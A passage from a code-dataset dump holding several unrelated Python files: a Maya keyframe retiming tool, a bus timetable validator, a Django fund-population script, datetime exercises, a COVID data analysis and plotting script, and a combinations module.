wrapInstance\r\n\r\nimport maya.cmds as cmds\r\nimport maya.mel as mel\r\nimport maya.OpenMayaUI as omui\r\nimport pymel.core as pmc\r\n\r\n\r\nclass RetimingUtils(object):\r\n\r\n    @classmethod\r\n    def retime_keys(cls, retime_value, incremental, move_to_next, move_to_start):\r\n        range_start_time, range_end_time = cls.get_selected_range()\r\n        start_keyframe_time = cls.get_start_keyframe_time(range_start_time)\r\n        last_keyframe_time = cls.get_last_keyframe_time()\r\n        current_time = start_keyframe_time\r\n\r\n        new_keyframe_times = [start_keyframe_time]\r\n\r\n        while current_time != last_keyframe_time:\r\n            next_keyframe_time = cls.find_keyframe(\"next\", current_time)\r\n\r\n            if incremental:\r\n                time_diff = next_keyframe_time - current_time\r\n                if current_time < range_end_time:\r\n                    time_diff += retime_value\r\n                    if time_diff < 1:\r\n                        time_diff = 1\r\n            else:\r\n                if current_time < range_end_time:\r\n                    time_diff = retime_value\r\n                else:\r\n                    time_diff = next_keyframe_time - current_time\r\n\r\n            new_keyframe_times.append(new_keyframe_times[-1] + time_diff)\r\n            current_time = next_keyframe_time\r\n\r\n        if len(new_keyframe_times) > 1:\r\n            cls.retime_keys_recursive(start_keyframe_time, 0, new_keyframe_times)\r\n\r\n        first_keyframe_time = cls.find_keyframe(\"first\")\r\n\r\n        if move_to_next and range_start_time >= first_keyframe_time:\r\n            next_keyframe_time = cls.find_keyframe(\"next\", start_keyframe_time)\r\n            cls.set_current_time(next_keyframe_time)\r\n        elif range_end_time > first_keyframe_time:\r\n            cls.set_current_time(start_keyframe_time)\r\n        else:\r\n            cls.set_current_time(range_start_time)\r\n\r\n        if move_to_start and range_start_time >= first_keyframe_time:\r\n            
first_keyframe_time = cls.find_keyframe(\"first\", start_keyframe_time)\r\n cls.set_current_time(first_keyframe_time)\r\n\r\n @classmethod\r\n def retime_keys_recursive(cls, current_time, index, new_keyframe_times):\r\n if index >= len(new_keyframe_times):\r\n return\r\n\r\n updated_keyframe_time = new_keyframe_times[index]\r\n next_keyframe_time = cls.find_keyframe(\"next\", current_time)\r\n\r\n if updated_keyframe_time < next_keyframe_time:\r\n cls.change_keyframe_time(current_time, updated_keyframe_time)\r\n cls.retime_keys_recursive(next_keyframe_time, index + 1, new_keyframe_times)\r\n else:\r\n cls.retime_keys_recursive(next_keyframe_time, index + 1, new_keyframe_times)\r\n cls.change_keyframe_time(current_time, updated_keyframe_time)\r\n\r\n @classmethod\r\n def set_current_time(cls, time):\r\n cmds.currentTime(time)\r\n\r\n @classmethod\r\n def get_selected_range(cls):\r\n playback_slider = mel.eval(\"$tempVar = $gPlayBackSlider\")\r\n selected_range = cmds.timeControl(playback_slider, q=True, rangeArray=True)\r\n\r\n return selected_range\r\n\r\n @classmethod\r\n def find_keyframe(cls, which, time=None):\r\n kwargs = {\"which\": which}\r\n if which in [\"next\", \"previous\"]:\r\n kwargs[\"time\"] = (time, time)\r\n\r\n return cmds.findKeyframe(**kwargs)\r\n\r\n @classmethod\r\n def change_keyframe_time(cls, current_time, new_time):\r\n cmds.keyframe(e=True, time=(current_time, current_time), timeChange=new_time)\r\n\r\n @classmethod\r\n def get_start_keyframe_time(cls, range_start_time):\r\n start_times = cmds.keyframe(q=True, time=(range_start_time, range_start_time))\r\n if start_times:\r\n return start_times[0]\r\n\r\n start_time = cls.find_keyframe(\"previous\", range_start_time)\r\n return start_time\r\n\r\n @classmethod\r\n def get_first_keyframe_time(cls):\r\n return cls.find_keyframe(\"first\")\r\n\r\n @classmethod\r\n def get_last_keyframe_time(cls):\r\n return cls.find_keyframe(\"last\")\r\n\r\n\r\nclass RetimingUi(QtWidgets.QDialog):\r\n\r\n WINDOW_TITLE = \"Retiming Tool\"\r\n\r\n ABSOLUTE_BUTTON_WIDTH = 50\r\n RELATIVE_BUTTON_WIDTH = 64\r\n\r\n RETIMING_PROPERTY_NAME = \"retiming_data\"\r\n\r\n dlg_instance = None\r\n\r\n\r\n @classmethod\r\n def display(cls):\r\n if not cls.dlg_instance:\r\n cls.dlg_instance = RetimingUi()\r\n\r\n if cls.dlg_instance.isHidden():\r\n cls.dlg_instance.show()\r\n else:\r\n cls.dlg_instance.raise_()\r\n cls.dlg_instance.activateWindow()\r\n\r\n @classmethod\r\n def maya_main_window(cls):\r\n main_window_ptr = omui.MQtUtil.mainWindow()\r\n return wrapInstance(int(main_window_ptr), QtWidgets.QWidget)\r\n\r\n def __init__(self):\r\n super(RetimingUi, self).__init__(self.maya_main_window())\r\n\r\n self.setWindowTitle(\"Retiming Tool\")\r\n if cmds.about(ntOS=True):\r\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\r\n elif cmds.about(macOS=True):\r\n self.setWindowFlags(QtCore.Qt.Tool)\r\n\r\n self.create_widgets()\r\n self.create_layouts()\r\n self.create_connections()\r\n\r\n def create_widgets(self):\r\n self.title_lbl = QtWidgets.QLabel(\"Retiming Tool\")\r\n self.title_lbl.setStyleSheet(\"font: bold 50px\")\r\n self.absolute_buttons = []\r\n for i in range(1, 11):\r\n btn = QtWidgets.QPushButton(\"{0}f\".format(i))\r\n btn.setFixedWidth(self.ABSOLUTE_BUTTON_WIDTH)\r\n btn.setProperty(self.RETIMING_PROPERTY_NAME, [i, False])\r\n self.absolute_buttons.append(btn)\r\n self.relative_buttons = []\r\n for i in [-2, -1, 1, 2]:\r\n btn = QtWidgets.QPushButton(\"{0}f\".format(i))\r\n 
btn.setFixedWidth(self.RELATIVE_BUTTON_WIDTH)\r\n btn.setProperty(self.RETIMING_PROPERTY_NAME, [i, True])\r\n self.relative_buttons.append(btn)\r\n self.move_to_next_cb = QtWidgets.QCheckBox(\"Move to Next Frame\")\r\n self.move_to_start_cb = QtWidgets.QCheckBox(\"Move to Start\")\r\n self.ripple_delete_btn = QtWidgets.QPushButton(\"Ripple Delete\")\r\n self.cleanup_keys_btn = QtWidgets.QPushButton(\"Clean-Up Keys\")\r\n\r\n def create_layouts(self):\r\n absolute_retime_layout = QtWidgets.QHBoxLayout()\r\n absolute_retime_layout.setSpacing(2)\r\n for btn in self.absolute_buttons:\r\n absolute_retime_layout.addWidget(btn)\r\n\r\n relative_retime_layout = QtWidgets.QHBoxLayout()\r\n relative_retime_layout.setSpacing(2)\r\n for btn in self.relative_buttons:\r\n relative_retime_layout.addWidget(btn)\r\n if relative_retime_layout.count() == 2:\r\n relative_retime_layout.addStretch()\r\n\r\n main_layout = QtWidgets.QVBoxLayout(self)\r\n main_layout.setContentsMargins(2, 2, 2, 2)\r\n main_layout.setSpacing(2)\r\n main_layout.addLayout(absolute_retime_layout)\r\n main_layout.addLayout(relative_retime_layout)\r\n main_layout.addWidget(self.move_to_next_cb)\r\n main_layout.addWidget(self.move_to_start_cb)\r\n main_layout.addWidget(self.ripple_delete_btn)\r\n main_layout.addWidget(self.cleanup_keys_btn)\r\n\r\n\r\n def create_connections(self):\r\n for btn in self.absolute_buttons:\r\n btn.clicked.connect(self.retime)\r\n\r\n for btn in self.relative_buttons:\r\n btn.clicked.connect(self.retime)\r\n\r\n self.ripple_delete_btn.clicked.connect(self.ripple_delete)\r\n self.cleanup_keys_btn.clicked.connect(self.cleanup_keys)\r\n\r\n def retime(self):\r\n btn = self.sender()\r\n if btn:\r\n retiming_data = btn.property(self.RETIMING_PROPERTY_NAME)\r\n move_to_next = self.move_to_next_cb.isChecked()\r\n move_to_start = self.move_to_start_cb.isChecked()\r\n\r\n cmds.undoInfo(openChunk=True)\r\n try:\r\n RetimingUtils.retime_keys(retiming_data[0], retiming_data[1], move_to_next, move_to_start)\r\n except:\r\n traceback.print_exc()\r\n om.MGlobal.displayError(\"Retime error occurred. 
See script for details.\")\r\n\r\n cmds.undoInfo(closeChunk=True)\r\n\r\n def ripple_delete(self):\r\n selected_objects = pmc.selected()\r\n start_time, end_time = RetimingUtils.get_selected_range()\r\n cmds.cutKey(selected_objects, time=(start_time, end_time), clear=True)\r\n\r\n def cleanup_keys(self):\r\n selected_objects = pmc.selected()\r\n start_time, end_time = RetimingUtils.get_selected_range()\r\n cmds.snapKey(selected_objects, time=(start_time, end_time))\r\n","sub_path":"retimingtool.py","file_name":"retimingtool.py","file_ext":"py","file_size_in_byte":8843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103857753","text":"import re\nimport json\nfrom datetime import datetime\nfrom typing import Dict, List\n\n\nclass TimetableUnit:\n def __init__(self, info: dict):\n self.bus_id: bool = type(info[\"bus_id\"]) is int\n self.stop_id: bool = type(info[\"stop_id\"]) is int\n self.stop_name = (\n lambda s: True if re.match(r'^[A-Z][A-Za-z ]+ (Road|Avenue|Boulevard|Street)$', s) is not None else False)(\n info[\"stop_name\"])\n self.next_stop: bool = type(info[\"next_stop\"]) is int and info[\"next_stop\"] is not None\n self.stop_type = (lambda s: True if re.match(r'^[SOF]$|^$', s) is not None else False)(info[\"stop_type\"])\n self.a_time = (lambda s: True if re.match(r'^(0[1-9]|1[0-9]|2[0-3]):[0-5][0-9]$', s) is not None else False)(\n info[\"a_time\"])\n\n\ndef sum_errors(string):\n table_of_errors = {\"stop_name\": 0,\n \"stop_type\": 0,\n \"a_time\": 0}\n for unit in json.loads(string):\n new_part = TimetableUnit(unit)\n for key, value in new_part.__dict__.items():\n if value is False:\n try:\n table_of_errors[key] += 1\n except KeyError:\n table_of_errors[key] = 1\n return table_of_errors\n\n\ndef syntax_correct(string) -> bool:\n sum_of_errors = sum(sum_errors(string).values())\n print(f'Format validation: {sum_of_errors} errors')\n for key, value in sum_errors(string).items():\n print(f'{key}: {value}')\n return sum_of_errors == 0\n\n\nclass BusStop:\n def __init__(self, info: dict):\n self.lines = []\n self.lines.append(info[\"bus_id\"])\n self.stop_id = info[\"stop_id\"]\n self.stop_name = info[\"stop_name\"]\n self.is_start = info[\"stop_type\"] == 'S'\n self.is_finnish = info[\"stop_type\"] == 'F'\n self.is_on_demand = info[\"stop_type\"] == 'O'\n\n def update(self, other):\n self.lines += other.lines\n self.is_start = self.is_start or other.is_start\n self.is_finnish = self.is_finnish or other.is_finnish\n self.is_on_demand = self.is_on_demand or other.is_on_demand\n\n\nclass Stop:\n def __init__(self, id, name, time, next_stop):\n self.id = id\n self.name = name\n self.time = time\n self.next_stop = next_stop\n\n\nclass BusLine:\n def __init__(self, info: dict):\n self.line_nr = info[\"bus_id\"]\n self.start = info[\"stop_id\"] if info[\"stop_type\"] == 'S' else ''\n self.finnish = info[\"stop_id\"] if info[\"stop_type\"] == 'F' else ''\n self.num_of_stops = 1\n self.stops = {}\n self.stops.update({info[\"stop_id\"]: Stop(info[\"stop_id\"], info[\"stop_name\"],\n datetime.strptime(info[\"a_time\"], '%H:%M'), info[\"next_stop\"])})\n\n def udpate_line(self, other: dict):\n if self.start == '' and other[\"stop_type\"] == 'S':\n self.start = other[\"stop_id\"]\n if self.finnish == '' and other[\"stop_type\"] == 'F':\n self.finnish = other[\"stop_id\"]\n self.num_of_stops += 1\n self.stops.update({other[\"stop_id\"]: Stop(other[\"stop_id\"],\n other[\"stop_name\"], datetime.strptime(other[\"a_time\"], '%H:%M'),\n 
other[\"next_stop\"])})\n\n def show_all(self):\n for key, value in self.__dict__.items():\n print(key, value)\n\n def check_data(self):\n return self.start != '' and self.finnish != ''\n\n\ndef create_stop_dict(string):\n stops = {}\n for unit in json.loads(string):\n new_part = BusStop(unit)\n if new_part.stop_name in stops:\n stops[new_part.stop_name].update(new_part)\n else:\n stops[new_part.stop_name] = new_part\n return stops\n\n\ndef create_line_dict(string):\n lines = {}\n for unit in json.loads(string):\n new_part = BusLine(unit)\n if new_part.line_nr in lines:\n lines[new_part.line_nr].udpate_line(unit)\n else:\n lines[new_part.line_nr] = new_part\n return lines\n\n\ndef get_statistics(BusStop_dict: Dict[str, BusStop]):\n table = {\n \"Start stops\": [], \"Transfer stops\": [], \"Finish stops\": []\n }\n for name, stop in BusStop_dict.items():\n if stop.is_start:\n table[\"Start stops\"].append(name)\n if stop.is_finnish:\n table[\"Finish stops\"].append(name)\n if len(stop.lines) > 1:\n table[\"Transfer stops\"].append(name)\n\n for key, content in table.items():\n print(f'{key}: {len(content)} {sorted(content)}')\n\n\ndef get_invalid_stops(BusStop_dict: Dict[str, BusStop]):\n print('On demand stops test:')\n errors = 0\n wrong_stop_type = []\n for name, stop in BusStop_dict.items():\n if (stop.is_start or stop.is_finnish or len(stop.lines) > 1) and stop.is_on_demand:\n wrong_stop_type.append(stop.stop_name)\n errors += 1\n if errors > 0:\n print(f'Wrong stop type: {sorted(wrong_stop_type)}')\n else:\n print(\"OK\")\n\n\ndef arrival_time_test(string):\n print('Arrival time test:')\n errors = 0\n bus_lines = create_line_dict(string)\n for nr, line in bus_lines.items():\n prev_stop = line.stops[line.start]\n current_stop = line.stops[line.stops[line.start].next_stop]\n while current_stop != line.finnish:\n if current_stop.time < prev_stop.time:\n errors += 1\n print(f'bus_id line {nr}: wrong time on station {current_stop.name}')\n break\n try:\n prev_stop = current_stop\n current_stop = line.stops[current_stop.next_stop]\n except KeyError:\n break\n if not errors:\n print(\"OK\")\n","sub_path":"data_check.py","file_name":"data_check.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339634426","text":"#\n# 10814번: 나이순 정렬\n# https://www.acmicpc.net/problem/10814\n# Version: Python 3.9.7\n#\n# Created by WhiteHyun on 2022/01/25.\n#\n\n\nfrom sys import stdin\n\nread = stdin.readline\n\nif __name__ == \"__main__\":\n sorted_list = sorted(\n [read().rstrip().split() for _ in range(int(read()))], key=lambda x: int(x[0]),\n )\n for value in sorted_list:\n print(*value)\n","sub_path":"boj/silver5/10814.py","file_name":"10814.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"548582303","text":"import os, json, django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'delta_hedge.settings')\n\ndjango.setup()\n#Populating Script for Fund Names and their respective CIK Numbers\nfrom search.models import Fund\n\ndef add_fund(name, cik):\n t = Fund.objects.create(fund_name=name, cik_num=cik, last_update=\"1900Q1\")\n t.save()\n\ndef get_funds_to_populate():\n with open('raw_13F_CIK_and_Name_List.txt') as rawFile:\n fundData = json.load(rawFile)\n\n for thing in fundData['cikData']:\n add_fund(thing['name'], int(thing['cik']))\n\nif __name__ == '__main__':\n Fund.objects.all().delete()\n 
get_funds_to_populate()","sub_path":"script_payload/populate_cik.py","file_name":"populate_cik.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"465713886","text":"#!/usr/bin/env python\r\n\r\nfrom datetime import timedelta\r\n\r\na = timedelta(days=2, hours=6)\r\nb = timedelta(hours=4.5)\r\nc = a + b\r\nprint (c) #->2 days, 10:30:00\r\nprint (c.days) #->2\r\nprint (c.seconds) #->37800\r\nprint (c.seconds / 3600) #->10.5\r\nprint (c.total_seconds()/ 3600) #->58.5\r\n\r\n\r\n\r\nfrom datetime import datetime\r\na = datetime(2017, 1, 17)\r\n#加多少天\r\nprint (a + timedelta(days=22))\r\n\r\n#减多少天\r\nprint (a + timedelta(days=-22))\r\n\r\nnow = datetime.today()\r\nprint (now)\r\nprint(now + timedelta(minutes=10))\r\n\r\n# datetime 会自动处理闰年\r\na = datetime(2012, 3, 1)\r\nb = datetime(2012, 2, 28)\r\nprint (a - b) \r\n\r\n\r\n\"\"\"\r\ndateutil 模块\r\n\t执行更加复杂的日期操作。\r\n\"\"\"\r\n\r\n\r\nfrom datetime import datetime, timedelta\r\nweekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\r\n\t'Friday', 'Saturday', 'Sunday']\r\n\r\ndef get_previous_byday(dayname, start_date=None):\r\n\tif start_date is None:\r\n\t\tstart_date = datetime.today()\r\n\t#星期一索引为0\r\n\tday_num = start_date.weekday()\r\n\tday_num_target = weekdays.index(dayname)\r\n\tdays_ago = (7 + day_num - day_num_target) % 7\r\n\tif days_ago == 0:\r\n\t\tdays_ago = 7\r\n\ttarget_date = start_date - timedelta(days=days_ago)\r\n\treturn target_date\r\n\r\nprint (get_previous_byday('Monday'))\r\n\r\n\r\n\r\nfrom datetime import datetime, date, timedelta\r\nimport calendar\r\n\r\ndef get_month_range(start_date=None):\r\n\tif start_date is None:\r\n\t\tstart_date = date.today().replace(day=1)\r\n\t\t\r\n\t\t#monthrange 找到改月的总天数\r\n\t_, days_in_month = calendar.monthrange(start_date.year, start_date.month)\r\n\tend_date = start_date + timedelta(days=days_in_month)\r\n\treturn (start_date, end_date)\r\n\r\nfrist_day, last_day = get_month_range()\r\nprint(frist_day)\r\nprint(last_day)\r\n\r\na_day = timedelta(days=1)\r\nwhile frist_day < last_day:\r\n\tprint(frist_day)\r\n\tfrist_day += a_day\r\n\r\n","sub_path":"third_selection/learn_data_date_time_datetime.py","file_name":"learn_data_date_time_datetime.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575586497","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef plot_bargraph(title, x_label, y_label, x_attribute, y_attribute):\n plt.subplots(figsize=(19, 10))\n plt.title(title)\n graph = sns.barplot(x=x_attribute, y=y_attribute)\n graph.set(xlabel=x_label, ylabel=y_label)\n plt.savefig('../plots/' + title + '.png')\n\ndef plot_countplot(df, title, x_label, y_label, x_attribute, hue=None, hue_order=None, class_order=None, width=19, height=10):\n plt.subplots(figsize=(width, height))\n plt.title(title)\n graph = ''\n if hue != None:\n graph = sns.countplot(data=df, x=x_attribute, hue=hue, hue_order = hue_order, order=class_order)\n else:\n graph = sns.countplot(data=df, x=x_attribute)\n graph.set(xlabel=x_label, ylabel=y_label)\n plt.savefig('../plots/' + title + '.png')\n\ndef plot_scatterplot(df, title, x_label, y_label, column_x, column_y, ):\n plt.subplots(figsize=(19, 10))\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.scatter(x=df[column_x], y=df[column_y])\n plt.savefig('../plots/' + title + '.png')\n\n# Helper 
functions\n# get data frame by name, [train, test, location]\ndef get_data_frame(name='train'):\n if name == 'train':\n return pd.read_csv('../data/cases_train.csv')\n elif name == 'location':\n return pd.read_csv('../data/location.csv')\n\n# prints missing values and returns list of columns and columns's missing value\ndef print_num_of_missing_vals(df):\n col_names = []\n col_na = []\n num_of_rows = len(df.index)\n for column in df.columns:\n col_names.append(column)\n col_na.append((len(df[df[column].isnull()])/num_of_rows)*100)\n print(column, \" \", len(df[df[column].isnull()]))\n return col_names, col_na\n\n# 1.1 Data Analysis cases_train.csv \ndef perform_data_analysis_train():\n df = get_data_frame()\n print(\"---- Dataset -> cases_train.csv --------------------\")\n col_names, col_na = print_num_of_missing_vals(df)\n\n plot_bargraph('Missing Values (cases_train)', 'Attributes', 'Total percentage of values missing', col_names, col_na)\n \n # plot countries v/s outcome for top 5 countries\n top_5_countries = df['country'].value_counts().nlargest(5).index\n country_df = df[df['country'].isin(top_5_countries)]\n\n plot_countplot(country_df, 'Top 5 Countries_vs_Outcome', 'Countries', 'Outcome', x_attribute='country', hue='outcome')\n plot_countplot(country_df, 'Top 5 Countries Frequency wise', 'Countries', 'Frequency', x_attribute='country')\n\n # Plot Sex\n plot_countplot(country_df, 'Sex vs Outcome (cases_train)', 'Sex', 'Outcome', x_attribute='sex', hue='outcome')\n\n # combination of longitude and latitude\n plot_scatterplot(df=df, title='Longitude and Latitude (cases_train)', x_label='Longitude', y_label='Latitude', column_x='longitude', column_y='latitude')\n\n # Top 5 countries's top 3 provinces\n top_provs = []\n for c in top_5_countries:\n temp_df = country_df[country_df['country'] == c]\n top_states = temp_df['province'].value_counts().nlargest(5).index\n top_provs.extend(top_states)\n top_provs_df = country_df[country_df['province'].isin(top_provs)]\n plot_countplot(top_provs_df,title='Top 3 Provinces in Top 5 countries (cases_train)', x_label='Country and Provinces', y_label='Count', x_attribute='country', hue='province', hue_order=top_provs, class_order= top_5_countries)\n\n # plot age frequency\n isDigit_age_df = df[df['age'].notna()]\n isDigit_age_df = isDigit_age_df.loc[isDigit_age_df['age'].str.isdigit()]\n isDigit_age_df = isDigit_age_df.sort_values(by='age')\n plot_countplot(df=isDigit_age_df, title='Age Frequency (cases_train)', x_label='Age', y_label='Frequency', x_attribute='age', width=25, class_order=isDigit_age_df['age'])\n\n # plot month frequency\n df['date_confirmation'] = pd.to_datetime(df['date_confirmation'], errors='coerce')\n df = df[df['date_confirmation'].notna()]\n df_f = df.loc[df['date_confirmation'].dt.year.between(2020, 2020)]\n month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'dec']\n month_counts = []\n for month in range(1, 13):\n count = len(df.loc[df['date_confirmation'].dt.month.between(month, month)])\n month_counts.append(count)\n plot_bargraph(title='Month Frequency (cases_train)', x_label='Month', y_label='Frequency', x_attribute=month_names, y_attribute=month_counts)\n\n# 1.1 Data Analysis location.csv\ndef perform_data_analysis_location():\n df = get_data_frame('location')\n print(\"---- Dataset -> location.csv --------------------\")\n col_names, col_na = print_num_of_missing_vals(df)\n \n # Attribute missing values\n plot_bargraph('Missing Values (location)', 'Attributes', 'Total percentage 
of values missing', col_names, col_na)\n\n    # combination of longitude and latitude\n    plot_scatterplot(df=df, title='Longitude and Latitude (location)', x_label='Longitude', y_label='Latitude', column_x='Long_', column_y='Lat')\n\n    # Top 10 countries with max confirmed cases\n    top_10_countries_confirmed = df.groupby(['Country_Region'])['Confirmed'].sum().sort_values(ascending=False).nlargest(10)\n    plot_bargraph(title='Top 10 Confirmed cases countries (location)', x_label='Country', y_label='# of Confirmed cases', x_attribute=top_10_countries_confirmed.index, y_attribute=top_10_countries_confirmed.values)\n    # Top 10 countries with max Deaths\n    top_10_countries_deaths = df.groupby(['Country_Region'])['Deaths'].sum().sort_values(ascending=False).nlargest(10)\n    plot_bargraph(title='Top 10 Deaths cases countries (location)', x_label='Country', y_label='# of Deaths', x_attribute=top_10_countries_deaths.index, y_attribute=top_10_countries_deaths.values)\n    # Top 10 countries with max Recovered cases\n    top_10_countries_recovered = df.groupby(['Country_Region'])['Recovered'].sum().sort_values(ascending=False).nlargest(10)\n    plot_bargraph(title='Top 10 Recovered cases countries (location)', x_label='Country', y_label='# of Recovered cases', x_attribute=top_10_countries_recovered.index, y_attribute=top_10_countries_recovered.values)\n    # Top 10 countries with max Active cases\n    top_10_countries_active = df.groupby(['Country_Region'])['Active'].sum().sort_values(ascending=False).nlargest(10)\n    plot_bargraph(title='Top 10 Active cases countries (location)', x_label='Country', y_label='# of Active cases', x_attribute=top_10_countries_active.index, y_attribute=top_10_countries_active.values)\n\n    # Top 10 frequent countries\n    top_10_countries = df['Country_Region'].value_counts().nlargest(10)\n    plot_bargraph(title='Top 10 Most Frequent countries (location)', x_label='Countries', y_label='Frequency', x_attribute=top_10_countries.index, y_attribute=top_10_countries.values)\n\n    # Top 10 frequent countries top 3 frequent provinces\n    top_countries_df = df[df['Country_Region'].isin(top_10_countries.index)]\n    top_provs = []\n    for c in top_10_countries.index:\n        temp = top_countries_df[top_countries_df['Country_Region'] == c]\n        provs = temp['Province_State'].value_counts().nlargest(3).index\n        top_provs.extend(provs)\n    top_provs_df = df[df[\"Province_State\"].isin(top_provs)]\n    plot_countplot(df=top_provs_df, title=\"Top Countries' Top 3 provinces (location)\", x_label='Countries', y_label='Frequency', x_attribute='Country_Region', hue='Province_State', hue_order=top_provs, class_order=top_10_countries.index)\n\n    # top incidence rate regions\n    top_incidence = df.sort_values(by='Incidence_Rate', ascending=False).head(5)\n    plot_bargraph(title='Top 5 Incidence Rate regions (location)', x_label='Region', y_label='Incidence rate', x_attribute=top_incidence['Combined_Key'], y_attribute=[float(i) for i in top_incidence['Incidence_Rate']])\n\n    # top case fatality rate regions\n    top_fatality = df.sort_values(by='Case-Fatality_Ratio', ascending=False).head(5)\n    plot_bargraph(title='Top 5 Case Fatality Rate regions (location)', x_label='Region', y_label='Case-Fatality Ratio', x_attribute=top_fatality['Combined_Key'], y_attribute=[float(i) for i in top_fatality['Case-Fatality_Ratio']])\n\n\n# 1.3 - Plot box plots and get outliers using IQR\ndef outlier_detection_elimination():\n    print('-------- Performing Outlier Detection and Elimination------')\n    df = get_data_frame()\n\n    print(\"-------- For 'Age' 
--------\")\n isDigit_age_df = df[df['age'].notna()]\n isDigit_age_df = isDigit_age_df.loc[isDigit_age_df['age'].str.isdigit()]\n isDigit_age_df['age'] = isDigit_age_df['age'].astype(float)\n sns.boxplot(x=isDigit_age_df['age'])\n plt.savefig('../plots/outliers/' + 'Cases Train- ' + 'Age' + '.png')\n # TODO: Decide the quantile \n q1, q3 = np.percentile(isDigit_age_df['age'], [25, 75])\n print('Quantile1 and Quantile3 -> ', q1, q3)\n iqr = q3-q1\n print('IQR -> ', iqr)\n lower_bound = q1 - (1.5*iqr)\n upper_bound = q3 + (1.5*iqr)\n print('Lower and Upper bound -> ', lower_bound, upper_bound)\n # No values in dataset that are less than 0\n isDigit_age_df = isDigit_age_df.loc[(isDigit_age_df['age'] < 0.0) | (isDigit_age_df['age'] > upper_bound)]\n isDigit_age_df.to_csv('../data/outliers/Age.csv')\n print('------ Outliers saved to ----> ./code/data/outliers/')\n\n numeric_cols = ['latitude', 'longitude']\n for column in numeric_cols:\n print(\"-------- For \" + column + \"--------\")\n temp_df = df[df[column].notna()]\n sns.boxplot(x=temp_df[column])\n plt.savefig('../plots/outliers/' + 'Cases Train- ' + column + '.png')\n q1, q3 = np.percentile(temp_df[column], [25, 75])\n print('Quantile1 and Quantile3 -> ', q1, q3)\n iqr = q3 - q1\n print('IQR -> ', iqr)\n lower_bound = q1 - (1.5*iqr)\n upper_bound = q3 + (1.5*iqr)\n print('Lower and Upper bound -> ', lower_bound, upper_bound)\n temp_df = temp_df.loc[(temp_df[column] < 0.0) | (temp_df[column] > upper_bound)]\n temp_df.to_csv('../data/outliers/'+column+'.csv')\n print('------ Outliers saved to ----> ./code/data/outliers/')\n \n\nif __name__ == '__main__':\n\n perform_data_analysis_train()\n perform_data_analysis_location()\n\n outlier_detection_elimination()\n\n","sub_path":"code/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"168293339","text":"'''Module to calculate combinations of elements\n\nThis module contains a function to calculate all subsets of a given length of\na set of n elements.\n\nE.g. All subsets of length 2 from a set of 5 elements.\n\nThere exist 10 subsets:\n \n >>> ncombinations(5, 2)\n 10\n\nAnd the subsets are:\n \n >>> list(combinations(5, 2))\n [[0, 1], [0, 2], [0, 3], [0, 4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]]\n \n\nsubsets() is a convenience function that yields the actual subsets from a list.\n\nBased on: Kenneth H. Rosen, Discrete Mathematics and Its Applications, 2nd edition (NY: McGraw-Hill, 1991), pp. 
284-286\n\nBut also interesting:\nhttp://code.activestate.com/recipes/190465-generator-for-permutations-combinations-selections\n\n# License: GNU General Public License, see http://www.clips.ua.ac.be/~vincent/scripts/LICENSE.txt\n'''\n__date__ = 'July 2013'\n__author__ = 'Vincent Van Asch'\n__version__ = '1.2.0'\n\n\n### Helper functions #################################################\ndef fact(number, bound=1):\n    '''Return the factorial: number*(number-1)*(number-2)*...*bound'''\n    if number < bound:\n        raise ValueError('number should be greater than or equal to bound')\n    \n    if number == bound:\n        return bound\n    else:\n        return number*fact(number-1, bound)\n    \ndef _next(a, numLeft, n, r, total):\n    '''Calculate next step'''\n    if numLeft == total:\n        return a, numLeft-1\n    else:\n        i=r-1\n        while a[i] == n-r+i:\n            i=i-1\n\n        a[i] = a[i] + 1\n        for j in xrange(i+1, r):\n            a[j] = a[i] + j - i\n\n        return a, numLeft-1\n    \n### Main function ####################################################\n\ndef ncombinations(n, r):\n    \"\"\"\n    Returns the total number of unique subsets of length r\n    you can take from n elements. \n    \n    n is the number of elements.\n    r is the length of the subsets.\n    \"\"\"\n    # Check\n    if n < 0: raise ValueError('n should be positive.')\n    if r < 0: raise ValueError('r should be positive.')\n    if r == 0: return 1\n    \n    # total = fact(n, 1)/(fact(r, 1)*fact(n-r, 1)) # Don't use this because calculating fact() of high numbers gives a RuntimeError\n    return fact(n, n-r+1)/fact(r, 1)\n\ndef combinations(n, r):\n    \"\"\"\n    Yields all unique subsets of length r that you\n    can take from n elements. \n    \n    n is the number of elements.\n    r is the length of the subsets.\n    \"\"\"\n    # Check\n    if n < 0: raise ValueError('n should be positive.')\n    if r < 0: raise ValueError('r should be positive.')\n    if r == 0: \n        yield ()\n        raise StopIteration\n    if r > n: raise StopIteration\n    if n < 1: raise StopIteration\n    \n    if r == n:\n        yield range(0, n)\n        raise StopIteration\n    \n    # Initialize\n    getallen = xrange(0,n)\n    a = range(r)\n    \n    # The total number of possible combinations\n    total = ncombinations(n, r)\n\n    # Produce all pairs\n    numLeft = total\n    while numLeft > 0:\n        comb=[] \n        a, numLeft = _next(a, numLeft, n, r, total)\n        for i in a:\n            comb.append(getallen[i])\n        \n        yield comb\n    \n    \n    \ndef subsets(l, r):\n    '''Takes a list with elements and yields all\n    unique subsets of length r.\n    \n    l: a list\n    r: an integer (length of the subset)\n    '''\n    for c in combinations(len(l), r):\n        yield tuple([l[x] for x in c])\n\n\n\ndef subcombinations(*sizes):\n    '''Yields all element combinations.\n    \n    For example:\n    >>> subcombinations(3,2)\n    [[0, 0], [0, 1], 